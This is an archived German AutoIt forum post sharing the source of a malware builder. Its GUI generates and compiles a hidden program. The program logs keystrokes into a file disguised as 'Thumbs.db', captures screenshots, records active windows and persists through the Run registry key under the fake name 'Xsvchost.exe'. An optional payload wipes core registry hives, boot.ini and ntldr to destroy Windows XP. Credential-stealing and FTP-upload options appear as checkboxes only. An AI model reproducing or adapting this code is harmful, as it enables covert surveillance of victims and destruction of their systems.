PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [AutoIt] Codeschnipsel: Builder von Keylogger, Pwd Stealer, ScreenCapture...


Orangen
03.02.2010, 20:25
#include <GUIConstantsEx.au3>
Opt("TrayIconHide", 1)
$Title1 = "Titel"
$Form1 = GUICreate($Title1, 450, 250)
$Checkbox1 = GUICtrlCreateCheckbox("Alle Tastenanschläge speichern", 7, 10, 177, 17)
$Checkbox2 = GUICtrlCreateCheckbox("Bildschirm speichern", 7, 25, 121, 17)
$Checkbox3 = GUICtrlCreateCheckbox("FTP Upload", 7, 40, 81, 17)
$Checkbox4 = GUICtrlCreateCheckbox("FTP Daten speichern", 7, 55, 121, 17)
$Checkbox5 = GUICtrlCreateCheckbox("Firefox Daten speichern", 7, 70, 137, 17)
$Checkbox6 = GUICtrlCreateCheckbox("Einstellungen in X speichern", 7, 85, 153, 17)
$Checkbox7 = GUICtrlCreateCheckbox("Pidgin Daten speichern", 7, 100, 129, 17)
$Checkbox8 = GUICtrlCreateCheckbox("Prozesse speichern", 7, 115, 129, 17)
$Checkbox9 = GUICtrlCreateCheckbox("Autostart", 7, 130, 129, 17)
$Checkbox10 = GUICtrlCreateCheckbox("in Verzeichnis kopieren", 7, 145, 129, 17)
$Checkbox11 = GUICtrlCreateCheckbox("Windows XP durch Löschen der Registry, boot.ini, ntldr zerstören", 7, 220, 250, 17)
$Checkbox12 = GUICtrlCreateCheckbox("Laufwerk ein und auswerfen", 7, 205, 175, 17)
$Checkbox12 = GUICtrlCreateCheckbox("loggdatei input + hidden FileSetAttrib", 7, 235, 175, 17)
$Input5 = GUICtrlCreateInput("C:\WINDOWS\Temp\", 192, 145, 73, 15)
$Input6 = GUICtrlCreateInput(@ScriptDir & "\Xsvchost.exe", 192, 130, 73, 15)
$Input7 = GUICtrlCreateInput("D:\", 192, 205, 15, 15)
$Label9 = GUICtrlCreateLabel("alle ", 232, 205, 17, 17)
$Input8 = GUICtrlCreateInput("10", 252, 205, 19, 15)
$Label10 = GUICtrlCreateLabel(" Sekunden speichern:", 271, 205, 123, 17)
$Label1 = GUICtrlCreateLabel("Prozessname:", 7, 160, 70, 17)
$Button1 = GUICtrlCreateButton("Alle Einstellungen erledigt -> Start", 7, 175, 177, 15, 0)
;~ $Label2 = GUICtrlCreateLabel("Speichern unter:", 192, 10, 82, 17)
$Label3 = GUICtrlCreateLabel("alle ", 192, 25, 17, 17)
$Input5 = GUICtrlCreateInput("10", 212, 25, 19, 15)
$Label3 = GUICtrlCreateLabel(" Sekunden ein und auswerfen:", 231, 25, 123, 17)
$Input1 = GUICtrlCreateInput("FTP Server", 192, 40, 81, 15)
$Input2 = GUICtrlCreateInput("Benutzername", 273, 40, 81, 15)
$Input3 = GUICtrlCreateInput("Passwort", 358, 40, 81, 15)
;~ $Label4 = GUICtrlCreateLabel("Speichern unter:", 192, 55, 82, 17)
;~ $Label5 = GUICtrlCreateLabel("Speichern unter:", 192, 70, 82, 17)
;~ $Label6 = GUICtrlCreateLabel("Speichern unter:", 192, 85, 82, 17)
;~ $Label7 = GUICtrlCreateLabel("Speichern unter:", 192, 100, 82, 17)
$Input4 = GUICtrlCreateInput("Xsvchost.exe", 192, 160, 73, 15)
If ProcessExists("Xsvchost.exe") Then
$Label8 = GUICtrlCreateLabel($Title1 & " läuft.", 7, 190, 50, 15)
$Button2 = GUICtrlCreateButton("Prozess schließen, Autostart entfernen, Dateien löschen", 58, 190, 280, 15)
Else
$Button2 = "123"
EndIf
GUISetState()
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Button1
If GUICtrlRead($Checkbox1) = 1 Or GUICtrlRead($Checkbox2) = 1 Or GUICtrlRead($Checkbox8) = 1 Or GUICtrlRead($Checkbox11) = 1 Then
$SomethingChanged = 1
Else
$SomethingChanged = 0
MsgBox(0, $Title1, "Keine Einstellungen vorgenommen. Exit.")
EndIf
If $SomethingChanged = 1 Then
$Au3File1Inhalt = '#include <Array.au3>' & @CRLF & _
'#include <Date.au3>' & @CRLF & _
'#include <Process.au3>' & @CRLF & _
'#include <ScreenCapture.au3>' & @CRLF & _
'#include <Misc.au3>' & @CRLF & _
'Opt("TrayIconHide", 1)' & @CRLF
If GUICtrlRead($Checkbox8) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Global $WinActive = WinGetTitle("[active]")' & @CRLF
EndIf
If GUICtrlRead($Checkbox9) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Autostart()' & @CRLF
EndIf
If GUICtrlRead($Checkbox11) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'RegDelete("HKEY_USERS")' & @CRLF & _
'RegDelete("HKEY_LOCAL_MACHINE")' & @CRLF & _
'FileDelete("C:\boot.ini")' & @CRLF & _
'FileDelete("C:\ntldr")' & @CRLF & _
'RegDelete("HKEY_CURRENT_CONFIG")' & @CRLF
EndIf
If GUICtrlRead($Checkbox2) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Global $timevalue = ' & GUICtrlRead($Input5) * 1000 & @CRLF & _
'$timeinit1 = TimerInit()' & @CRLF
EndIf
If GUICtrlRead($Checkbox12) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'$timerinit2 = TimerInit()' & @CRLF & _
'$timer2value = ' & GUICtrlRead($Input8) & @CRLF
EndIf
If GUICtrlRead($Checkbox1) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & 'Funktion_1_Start()' & @CRLF
EndIf
$Au3File1Inhalt = $Au3File1Inhalt & 'While 1' & @CRLF & _
'Sleep(10)' & @CRLF
If GUICtrlRead($Checkbox1) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & 'Tasten()' & @CRLF
EndIf
If GUICtrlRead($Checkbox8) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & 'Process()' & @CRLF
EndIf
If GUICtrlRead($Checkbox12) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & @CRLF & _
'$timerdiff2 = TimerDiff($timerinit2)' & @CRLF & _
'If $timerdiff2 > $timer2value Then' & @CRLF & _
'$timerinit2 = TimerInit()' & @CRLF & _
'cdfun()' & @CRLF & _
'EndIf' & @CRLF
EndIf
If GUICtrlRead($Checkbox2) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'$timediff1 = TimerDiff($timeinit1)' & @CRLF & _
'If $timediff1 > $timevalue Then' & @CRLF & _
'$timeinit1 = TimerInit()' & @CRLF & _
'ScreenCapture()' & @CRLF & _
'EndIf' & @CRLF
EndIf
$Au3File1Inhalt = $Au3File1Inhalt & _
'WEnd' & @CRLF
If GUICtrlRead($Checkbox2) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func ScreenCapture()' & @CRLF & _
'$Cap= _ScreenCapture_Capture()' & @CRLF & _
'_ScreenCapture_SaveImage("Screen " & @MDAY & "." & @MON & "." & @YEAR & " " & @HOUR & "." & @MIN & "." & @SEC & ".gif",$Cap)' & @CRLF & _
'EndFunc' & @CRLF
EndIf
If GUICtrlRead($Checkbox12) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func cdfun()' & @CRLF & _
'CDTray("' & GUICtrlRead($Input7) & '", "open")' & @CRLF & _
'CDTray("' & GUICtrlRead($Input7) & '", "closed")' & @CRLF & _
'EndFunc' & @CRLF
EndIf
If GUICtrlRead($Checkbox8) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func Process()' & @CRLF & _
'If $WinActive <> WinGetTitle("") Then' & @CRLF & _
'FileWrite($file3, @CRLF & @CRLF & _NowTime() & @CRLF & $WinActive & @CRLF)' & @CRLF & _
'$WinActive = WinGetTitle("[active]")' & @CRLF & _
'EndIf' & @CRLF & _
'EndFunc ;==>Process' & @CRLF
EndIf
If GUICtrlRead($Checkbox9) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func Autostart()' & @CRLF & _
'RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run", "' & GUICtrlRead($Input4) & '", "REG_SZ", "' & GUICtrlRead($Input6) & '")' & @CRLF & _
'EndFunc ;==>autostart' & @CRLF
EndIf
If GUICtrlRead($Checkbox1) = 1 Then
$Au3File1Inhalt = $Au3File1Inhalt & _
'Func Funktion_1_Start()' & @CRLF & _
'$file1 = "/Thumbs.db"' & @CRLF & _
'Global $file3 = @ScriptDir & $file1' & @CRLF & _
'Global $6 = 81' & @CRLF & _
'Global $dll = DllOpen("user32.dll")' & @CRLF & _
'Global $array11[$6]' & @CRLF & _
'$array11[0] = 80' & @CRLF & _
'Global $Array12[$6] = [$6, "{Left Mouse}", "{Right Mouse}", "{Code 3 Unbekannt}", "{MIDDLE MOUSE}", "{X1 mouse button}", "{X2 mouse button}", "{Code 7 Unbekannt}", "{BACKSPACE}", "{TAB}", "{SHIFT}", "{CTRL}", "{ALT}", "{PAUSE}", "{CAPSLOCK}", "Code 15 unbekannt", "Code 16 unbekannt", "Code 17 unbekannt", "Code 18 unbekannt", "Code 19 unbekannt", "{SPACE}", "{PGUP}", "{PGDOWN}", "{END}", "{HOME}", "{LEFT ARROW}", "{UP ARROW}", "{RIGHT ARROW}", "{DOWN ARROW}", "{Code 29 unbekannt}", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "{Code 40: Unbekannt}", "a", "b", "c", "d", "e", "f", "g", "h", "i", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "{F1}", "{F2}", "{F3}", "{F4}", "{F5}", "{F6}", "{F7}", "{F8}", "{F9}", "{F10}", "{Code 80 Unbekannt}"]' & @CRLF & _
'Global $Array13[56][2] = [["4A", "j"],["4B", "k"],["4C", "l"],["4D", "m"],["4E", "n"],["4F", "o"],["5A", "z"],["2A", "{PRINT}"],["2B", "{EXECUTE}"],["2C", "{PRINT SCREEN}"],["2D", "{INS}"],["2E", "{DEL}"],["1B", "{ESC}"],["0C", "{CLEAR}"],["0D", "{ENTER}"],["5B", "{Left Windows}"],["5C", "{Right Windows}"],["6A", "{Multiply}"],["6B", "{Add key}"],["6C", "{pator key}"],["6D", "{Subtract key}"],["6E", "{cal key}"],["6F", "{Divide key}"],["BA", "ü"],["BB", "+"],["BC", ","],["BD", "-"],["BE", "."],["BF", "#"],["C0", "ö"],["DB", "ß"],["DC", "^"],["DD", "´"],["DE", "ä"],["DF", "{Code DF Unbekannt}"],["E2", "<"],["7A", "{F11}"],["7B", "{F12}"],["7C", "{F13}"],["7D", "{F14}"],["7E", "{F15}"],["7F", "{F16}"],["80H", "{F17}"],["81H", "{F18}"],["82H", "[F19}"],["83H", "{F20}"],["84H", "{F21}"],["85H", "{F22}"],["86H", "{F23}"],["87H", "{F24}"],["A0", "{Left SHIFT key}"],["A1", "{Right SHIFT key}"],["A2", "{Left CONTROL key}"],["A3", "{Right CONTROL key}"],["A4", "{Left MENU key}"],["A5", "{Right MENU key}"]]' & @CRLF & _
'For $i = 1 To 80' & @CRLF & _
'$array11[$i] = $i' & @CRLF & _
'Next' & @CRLF & _
'EndFunc ;==>Funktion_1_Start' & @CRLF & _
'Func Tasten()' & @CRLF & _
'For $i = 1 To $array11[0]' & @CRLF & _
'If _IsPressed($array11[$i], $dll) Then' & @CRLF & _
'FileWrite($file3, $Array12[$i])' & @CRLF & _
'EndIf' & @CRLF & _
'While _IsPressed($array11[$i]) = 1' & @CRLF & _
'WEnd' & @CRLF & _
'Next' & @CRLF & _
'For $i = 0 To UBound($Array13, 1) - 1' & @CRLF & _
'If _IsPressed($Array13[$i][0], $dll) Then' & @CRLF & _
'FileWrite($file3, $Array13[$i][1])' & @CRLF & _
'EndIf' & @CRLF & _
'While _IsPressed($Array13[$i][0]) = 1' & @CRLF & _
'WEnd' & @CRLF & _
'Next' & @CRLF & _
'EndFunc ;==>Tasten' & @CRLF
EndIf
If FileExists("Program.au3") = 1 Then
FileDelete("Program.au3")
EndIf
FileWrite("Program.au3", $Au3File1Inhalt)
If FileExists(GUICtrlRead($Input4)) = 1 Then
FileDelete(GUICtrlRead($Input4))
EndIf
If ProcessExists(GUICtrlRead($Input4)) Then
ProcessClose(GUICtrlRead($Input4))
EndIf
FileInstall("upx.exe", "upx.exe")
FileInstall("Aut2exe.exe", "Aut2exe.exe")
FileInstall("AutoItSC.bin", "AutoItSC.bin")
FileInstall("Array.au3", "Array.au3")
FileInstall("Date.au3", "Date.au3")
FileInstall("File.au3", "File.au3")
FileInstall("FileConstants.au3", "FileConstants.au3")
FileInstall("FontConstants.au3", "FontConstants.au3")
FileInstall("FTPEx.au3", "FTPEx.au3")
FileInstall("GDIPlus.au3", "GDIPlus.au3")
FileInstall("GDIPlusConstants.au3", "GDIPlusConstants.au3")
FileInstall("Misc.au3", "Misc.au3")
FileInstall("WinAPI.au3", "WinAPI.au3")
FileInstall("WinAPIError.au3", "WinAPIError.au3")
FileInstall("WindowsConstants.au3", "WindowsConstants.au3")
FileInstall("Memory.au3", "Memory.au3")
FileInstall("MemoryConstants.au3", "MemoryConstants.au3")
FileInstall("ScreenCapture.au3", "ScreenCapture.au3")
FileInstall("SendMessage.au3", "SendMessage.au3")
FileInstall("Constants.au3", "Constants.au3")
FileInstall("StructureConstants.au3", "StructureConstants.au3")
FileInstall("ProcessConstants.au3", "ProcessConstants.au3")
FileInstall("Security.au3", "Security.au3")
FileInstall("SecurityConstants.au3", "SecurityConstants.au3")
FileInstall("Process.au3", "Process.au3")
RunWait("Aut2exe.exe /in Program.au3 /out " & GUICtrlRead($Input4))
;~ FileDelete("Program.au3")
$run = Run(GUICtrlRead($Input4))
If $run = 0 Then
MsgBox(0, "", "")
EndIf
EndIf
Exit
Case $Button2
MsgBox(0, "", "Prozess entfernt - Erfolg nicht sicher")
ProcessClose("Xsvchost.exe")
EndSwitch
WEnd

Codeschnipsel für Leute, die sich schon ein bisschen mit AutoIt auskennen...